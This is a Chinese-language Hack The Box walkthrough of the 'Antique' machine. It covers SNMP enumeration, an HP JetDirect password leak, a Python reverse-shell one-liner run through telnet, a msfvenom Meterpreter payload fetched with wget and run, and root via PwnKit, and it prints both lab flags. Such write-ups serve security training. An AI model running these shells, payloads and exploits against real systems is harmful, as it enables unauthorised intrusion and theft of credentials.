目录

连接至HTB服务器并启动靶机

1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?

2.What service is running on the UDP port that we identified in the previous question?

3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?

4.What is the password for the HJ JetDirect Telnet service?

通过searchsploit工具对该关键词进行搜索

5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?

6.Submit the flag located on the lp user's desktop.

USER_FLAG：4c78d4500a5c9f6281d7c3d9dd3ad3c8

7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?

8.What version of CUPS is running on port 631?

9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?

10.Submit the flag located in root's home directory.

将Meterpreter收回会话

ROOT_FLAG：5821059e12bbea7d6e680222d31cdd65

---

连接至HTB服务器并启动靶机

靶机IP：10.10.11.107

分配IP：10.10.16.22

---

1.After running an nmap scan on TCP ports we identify port 23 open. If we run another scan on UDP ports, which port do we find open?

使用nmap对靶机进行TCP、UDP端口扫描

nmap -p- --min-rate=1500 -T4 -sS -sU -Pn {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 08:05 EDT
Warning: 10.10.11.107 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.107
Host is up (0.075s latency).
Not shown: 65534 closed tcp ports (reset), 307 closed udp ports (port-unreach), 65227 open|filtered udp ports (no-response)
PORT    STATE SERVICE
23/tcp  open  telnet
161/udp open  snmp

Nmap done: 1 IP address (1 host up) scanned in 347.51 seconds

由扫描结果可见，靶机开放UDP端口：161

---

2.What service is running on the UDP port that we identified in the previous question?

使用nmap对靶机161端口进行脚本、服务信息扫描

nmap -p 161 -sU -sCV {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -p 161 -sU -sCV 10.10.11.107
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-23 09:12 EDT
Nmap scan report for 10.10.11.107
Host is up (0.079s latency).

PORT    STATE SERVICE VERSION
161/udp open  snmp    SNMPv1 server (public)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.95 seconds

由扫描结果可见，SERVICE栏目下显示161端口运行的服务为：snmp

---

3.Let's connect to port 23 using the "telnet" command. What product name does Telnet give us that can help us identify the software that is in use?

使用snmpwalk枚举靶机SNMP服务

snmpwalk -v 1 -c public {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop]
└─# snmpwalk -v 1 -c public 10.10.11.107
iso.3.6.1.2.1 = STRING: "HTB Printer"

回显HTB Printer，尝试连接靶机Telnet服务

telnet {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: root
Invalid password
Connection closed by foreign host.

尝试空密码无法进入，通过回显可见字符串：HP JetDirect

---

4.What is the password for the HJ JetDirect Telnet service?

通过searchsploit工具对该关键词进行搜索

searchsploit SNMP | grep 'JetDirect'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit SNMP | grep 'JetDirect'
HP JetDirect Printer - SNMP JetAdmin Device Passw | hardware/remote/22319.txt

将该漏洞PoC复制到当前目录下

searchsploit -m 22319.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 22319.txt
  Exploit: HP JetDirect Printer - SNMP JetAdmin Device Password Disclosure
      URL: https://www.exploit-db.com/exploits/22319
     Path: /usr/share/exploitdb/exploits/hardware/remote/22319.txt
    Codes: CVE-2002-1048, OSVDB-2079
 Verified: True
File Type: ASCII text, with very long lines (323)
Copied to: /home/kali/Desktop/temp/22319.txt

查看该PoC内容

cat 22319.txt

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cat 22319.txt                                                             
HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerability

source: https://www.securityfocus.com/bid/7001/info

A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer.

It has been reported that HP JetDirect printers leak the web JetAdmin device password under some circumstances. By sending an SNMP GET request to a vulnerable printer, the printer will return the hex-encoded device password to the requester. This could allow a remote user to access and change configuration of the printer.

C:\>snmputil get example.printer public .1.3.6.1.4.1.11.2.3.9.1.1.13.0

国产化后

HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3263A/300.0 X打印机SNMP JetAdmin设备密码泄露漏洞

来源：https://www.securityfocus.com/bid/7001/info

JetDirect打印机的问题可能会使远程用户获得对打印机的管理访问权限。

据报道，HP JetDirect打印机在某些情况下会泄露web JetAdmin设备密码。通过向易受攻击的打印机发送SNMP GET请求，打印机将向请求者返回十六进制编码的设备密码。这可以允许远程用户访问和更改打印机的配置。

C： \>直到将example.printer公开。1.3.6.1.4.1.11.2.3.9.1.1.13.0

利用payload枚举靶机SNMP服务密码：1.3.6.1.4.1.11.2.3.9.1.1.13.0

snmpwalk -v 1 -c public {TARGET_IP} .1.3.6.1.4.1.11.2.3.9.1.1.13.0

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# snmpwalk -v 1 -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

获得一串密文，尝试将其中的空格都删除

504073737730726440313233212131323313917181922232526273031333435373839424349505154575861657475798283869091949598103106111114115119122123126130131134135

再通过十六进制转ASCII进行解码

P@ssw0rd@123!!123q"2Rbs3CSs$4EuWGW(8i    IYaA"1&1A5

截取相关凭证信息，密码为：P@ssw0rd@123!!123

---

5.After we successfuly authenticate with the Telnet service, which command can we use to execute system commands?

使用上文获取的密码登录靶机Telnet服务

telnet {TARGET_IP}

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# telnet 10.10.11.107
Trying 10.10.11.107...
Connected to 10.10.11.107.
Escape character is '^]'.

HP JetDirect

Password: P@ssw0rd@123!!123

登录成功后，回显提示我们输入"?"查看帮助

Please type "?" for HELP
> ?

To Change/Configure Parameters Enter:
Parameter-name: value <Carriage Return>

Parameter-name Type of value
ip: IP-address in dotted notation
subnet-mask: address in dotted notation (enter 0 for default)
default-gw: address in dotted notation (enter 0 for default)
syslog-svr: address in dotted notation (enter 0 for default)
idle-timeout: seconds in integers
set-cmnty-name: alpha-numeric string (32 chars max)
host-name: alpha-numeric string (upper case only, 32 chars max)
dhcp-config: 0 to disable, 1 to enable
allow: <ip> [mask] (0 to clear, list to display, 10 max)

addrawport: <TCP port num> (<TCP port num> 3000-9000)
deleterawport: <TCP port num>
listrawport: (No parameter required)

exec: execute system commands (exec id)
exit: quit from telnet session

由回显可见，执行系统命令的命令为：exec

---

6.Submit the flag located on the lp user's desktop.

尝试利用python获得反弹shell

exec python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{NATIVE_IP}",{NATIVE_PORT}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.22] from (UNKNOWN) [10.10.11.107] 48948
/bin/sh: 0: can't access tty; job control turned off
$ whoami
lp

提升tty

python3 -c 'import pty; pty.spawn("/bin/bash")'

查看user_flag内容

cat user.txt

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
lp@antique:~$ ls
ls
telnet.py  user.txt
lp@antique:~$ cat user.txt
cat user.txt
4c78d4500a5c9f6281d7c3d9dd3ad3c8

USER_FLAG：4c78d4500a5c9f6281d7c3d9dd3ad3c8

---

7.The box is has a service listening on the 127.0.0.1 interface. What TCP port is it?

查看当前网络连接

ss -tan

由回显可见，在本地(127.0.0.1)有服务运行在端口：631

---

8.What version of CUPS is running on port 631?

通过curl命令查看631端口托管服务的相信息

curl 127.0.0.1:631

lp@antique:~$ curl 127.0.0.1:631
curl 127.0.0.1:631
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
<HEAD>
        <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
        <TITLE>Home - CUPS 1.6.1</TITLE>
        <LINK REL="STYLESHEET" TYPE="text/css" HREF="/cups.css">
        <LINK REL="SHORTCUT ICON" HREF="/images/cups-icon.png" TYPE="image/png">
</HEAD>
<BODY>
<TABLE CLASS="page" SUMMARY="{title}">
<TR><TD CLASS="body">
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0" SUMMARY="">
<TR HEIGHT="36">
<TD><A HREF="http://www.cups.org/" TARGET="_blank"><IMG
SRC="/images/left.gif" WIDTH="64" HEIGHT="36" BORDER="0" ALT=""></A></TD>
<TD CLASS="sel"><A HREF="/">&nbsp;&nbsp;Home&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/admin">&nbsp;&nbsp;Administration&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/classes/">&nbsp;&nbsp;Classes&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/help/">&nbsp;&nbsp;Online&nbsp;Help&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/jobs/">&nbsp;&nbsp;Jobs&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel"><A HREF="/printers/">&nbsp;&nbsp;Printers&nbsp;&nbsp;</A></TD>
<TD CLASS="unsel" WIDTH="100%"><FORM ACTION="/help/" METHOD="GET"><INPUT
TYPE="SEARCH" NAME="QUERY" SIZE="20" PLACEHOLDER="Search Help"
AUTOSAVE="org.cups.help" RESULTS="20"></FORM></TD>
<TD><IMG SRC="/images/right.gif" WIDTH="4" HEIGHT="36" ALT=""></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD STYLE="padding-right: 20px;">

<H1>CUPS 1.6.1</H1>

<P>CUPS is the standards-based, open source printing system developed by
<A HREF="http://www.apple.com/">Apple Inc.</A> for OS<SUP>&reg;</SUP> X and
other UNIX<SUP>&reg;</SUP>-like operating systems.</P>

</TD>
<TD><A HREF="http://www.cups.org/"><IMG SRC="images/cups-icon.png" WIDTH="128"
HEIGHT="128" ALT="CUPS"></A></TD>
</TR>
</TABLE>

<TABLE CLASS="indent" SUMMARY="">
<TR><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-right: 20px;">

<H2>CUPS for Users</H2>

<P><A HREF="help/overview.html">Overview of CUPS</A></P>

<P><A HREF="help/options.html">Command-Line Printing and Options</A></P>

<P><A HREF="help/whatsnew.html">What's New in CUPS 1.6</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.general">User Forum</A></P>

</TD><TD VALIGN="top" STYLE="border-right: dotted thin #cccccc; padding-left: 20px; padding-right: 20px;">

<H2>CUPS for Administrators</H2>

<P><A HREF="admin">Adding Printers and Classes</A></P>

<P><A HREF="help/policies.html">Managing Operation Policies</A></P>

<P><A HREF="help/accounting.html">Printer Accounting Basics</A></P>

<P><A HREF="help/security.html">Server Security</A></P>

<P><A HREF="help/kerberos.html">Using Kerberos Authentication</A></P>

<P><A HREF="help/network.html">Using Network Printers</A></P>

<P><A HREF="help/ref-cupsd-conf.html">cupsd.conf Reference</A></P>

<P><A HREF="http://www.cups.org/ppd.php">Find Printer Drivers</A></P>

</TD><TD VALIGN="top" STYLE="padding-left: 20px;">

<H2>CUPS for Developers</H2>

<P><A HREF="help/api-overview.html">Introduction to CUPS Programming</A></P>

<P><A HREF="help/api-cups.html">CUPS API</A></P>

<P><A HREF="help/api-filter.html">Filter and Backend Programming</A></P>

<P><A HREF="help/api-httpipp.html">HTTP and IPP APIs</A></P>

<P><A HREF="help/api-ppd.html">PPD API</A></P>

<P><A HREF="help/api-raster.html">Raster API</A></P>

<P><A HREF="help/ref-ppdcfile.html">PPD Compiler Driver Information File Reference</A></P>

<P><A HREF="http://www.cups.org/newsgroups.php?gcups.development">Developer Forum</A></P>

</TD></TR>
</TABLE>

</TD></TR>
<TR><TD>&nbsp;</TD></TR>
<TR><TD CLASS="trailer">CUPS and the CUPS logo are trademarks of
<A HREF="http://www.apple.com">Apple Inc.</A> CUPS is copyright 2007-2012 Apple
Inc. All rights reserved.</TD></TR>
</TABLE>
</BODY>
</HTML>

由回显中<TITLE>元素可见，该端口托管服务CUPS版本为：1.6.1

---

9.What is the 2012 CVE associated with a local file read vulnerability in CUPS 1.6.1?

启动Metasploit

msfconsole

搜索CUPS 1.6.1

search CUPS 1.6.1

使用该模块

use post/multi/escalate/cups_root_file_read

展示该模块信息

info

msf6 post(multi/escalate/cups_root_file_read) > info

       Name: CUPS 1.6.1 Root File Read
     Module: post/multi/escalate/cups_root_file_read
   Platform: Linux, OSX
       Arch:
       Rank: Normal
  Disclosed: 2012-11-20

Provided by:
  Jann Horn
  joev <joev@metasploit.com>

Compatible session types:

Basic options:
  Name       Current Setting          Required  Description
  ----       ---------------          --------  -----------
  ERROR_LOG  /var/log/cups/error_log  yes       The original path to the CUPS error log
  FILE       /etc/shadow              yes       The file to steal.
  SESSION                             yes       The session to run this module on

Description:
  This module exploits a vulnerability in CUPS < 1.6.2, an open source printing system.
  CUPS allows members of the lpadmin group to make changes to the cupsd.conf
  configuration, which can specify an Error Log path. When the user visits the
  Error Log page in the web interface, the cupsd daemon (running with setuid root)
  reads the Error Log path and echoes it as plaintext.

  This module is known to work on Mac OS X < 10.8.4 and Ubuntu Desktop <= 12.0.4
  as long as the session is in the lpadmin group.

  Warning: if the user has set up a custom path to the CUPS error log,
  this module might fail to reset that path correctly. You can specify
  a custom error log path with the ERROR_LOG datastore option.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-5519
  OSVDB (87635)
  http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692791

View the full module info with the info -d command.

由展示信息可见，该模块基于漏洞：CVE-2012-5519

---

10.Submit the flag located in root's home directory.

查看靶机系统信息

查看系统类型以及系统位数

uname
uname -m

lp@antique:~$ uname
uname
Linux
lp@antique:~$ uname -m
uname -m
x86_64

通过获得的系统信息，生成相对于的Meterpreter马子

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={NATIVE_IP} LPORT=1234 -f elf > shell.elf

┌──(root㉿kali)-[/home/kali/Desktop]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.16.22 LPORT=1234 -f elf > shell.elf     
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes

通过python开启一个http服务将马子上传至靶机

python -m http.server 7777

靶机通过wget命令下载马子

wget http://{NATIVE_IP}:7777/shell.elf -O shell.elf

lp@antique:~$ wget http://10.10.16.22:7777/shell.elf -O shell.elf
wget http://10.10.16.22:7777/shell.elf -O shell.elf
--2024-10-24 04:52:16--  http://10.10.16.22:7777/shell.elf
Connecting to 10.10.16.22:7777... connected.
HTTP request sent, awaiting response... 200 OK
Length: 250 [application/octet-stream]
Saving to: ‘shell.elf’

shell.elf           100%[===================>]     250  --.-KB/s    in 0s      

2024-10-24 04:52:17 (33.7 MB/s) - ‘shell.elf’ saved [250/250]

在MSF中切换到监听模块：exploit/multi/handler

use exploit/multi/handler

配置好参数：LHOST、LPORT、PAYLOAD

msf6 exploit(multi/handler) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(multi/handler) > set LPORT 1234
LPORT => 1234

msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

输入exploit、run开始监听，靶机执行运行shell.elf文件

lp@antique:~$ chmod +x shell.elf
chmod +x shell.elf
lp@antique:~$ ./shell.elf
./shell.elf

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.22:1234
[*] Sending stage (3045380 bytes) to 10.10.11.107
[*] Meterpreter session 2 opened (10.10.16.22:1234 -> 10.10.11.107:50326) at 2024-10-24

将Meterpreter收回会话

background

meterpreter > background
[*] Backgrounding session 2...

切换到提权模块(post/multi/recon/local_exploit_suggester)进行扫描

use post/multi/recon/local_exploit_suggester

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.11.107 - Collecting local exploits for x64/linux...
[*] 10.10.11.107 - 198 exploit checks are being tried...
[+] 10.10.11.107 - exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec: The target is vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0847_dirtypipe: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/cve_2022_0995_watch_queue: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/cve_2022_1043_io_uring_priv_esc: The target is vulnerable. > 1 CPU required, detected: 2
[+] 10.10.11.107 - exploit/linux/local/cve_2023_0386_overlayfs_priv_esc: The target appears to be vulnerable. Linux kernel version found: 5.13.0
[+] 10.10.11.107 - exploit/linux/local/netfilter_nft_set_elem_init_privesc: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/pkexec: The service is running, but could not be validated.
[+] 10.10.11.107 - exploit/linux/local/su_login: The target appears to be vulnerable.
[+] 10.10.11.107 - exploit/linux/local/sudo_baron_samedit: The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build.
[+] 10.10.11.107 - exploit/linux/local/sudoedit_bypass_priv_esc: The target appears to be vulnerable. Sudo 1.8.31.pre.1ubuntu1.2 is vulnerable, but unable to determine editable file. OS can NOT be exploited by this module
[*] Running check method for exploit 70 / 70
[*] 10.10.11.107 - Valid modules for session 2:

这里直接尝试第一个可利用模块：exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

需要配置参数：LHOST、LPORT、SESSION、PAYLOAD

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LHOST 10.10.16.22
LHOST => 10.10.16.22
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set LPORT 7878
LPORT => 7878
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
PAYLOAD => linux/x64/meterpreter/reverse_tcp

输入run、exploit开始漏洞利用

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > exploit

[*] Started reverse TCP handler on 10.10.16.22:7878
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Verify cleanup of /tmp/.ybwjexbl
[+] The target is vulnerable.
[*] Writing '/tmp/.sflzlca/fwxcodr/fwxcodr.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.sflzlca
[*] Sending stage (3045380 bytes) to 10.10.11.107
[+] Deleted /tmp/.sflzlca/fwxcodr/fwxcodr.so
[+] Deleted /tmp/.sflzlca/.arusgsxpspiz
[+] Deleted /tmp/.sflzlca
[*] Meterpreter session 3 opened (10.10.16.22:7878 -> 10.10.11.107:58106) at 2024-10-24 01:15:40 -0400

meterpreter > getuid
Server username: root

可以看到顺利拿到了root权限

---

切换到终端

shell

提升TTY

python3 -c 'import pty; pty.spawn("/bin/bash")'

查找root_flag位置

find / -name 'root.txt'

查看root_flag内容

cat /root/root.txt

meterpreter > shell
Process 1982 created.
Channel 1 created.
python3 -c 'import pty; pty.spawn("/bin/bash")'
root@antique:/# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@antique:/# cat /root/root.txt
cat /root/root.txt
5821059e12bbea7d6e680222d31cdd65

ROOT_FLAG：5821059e12bbea7d6e680222d31cdd65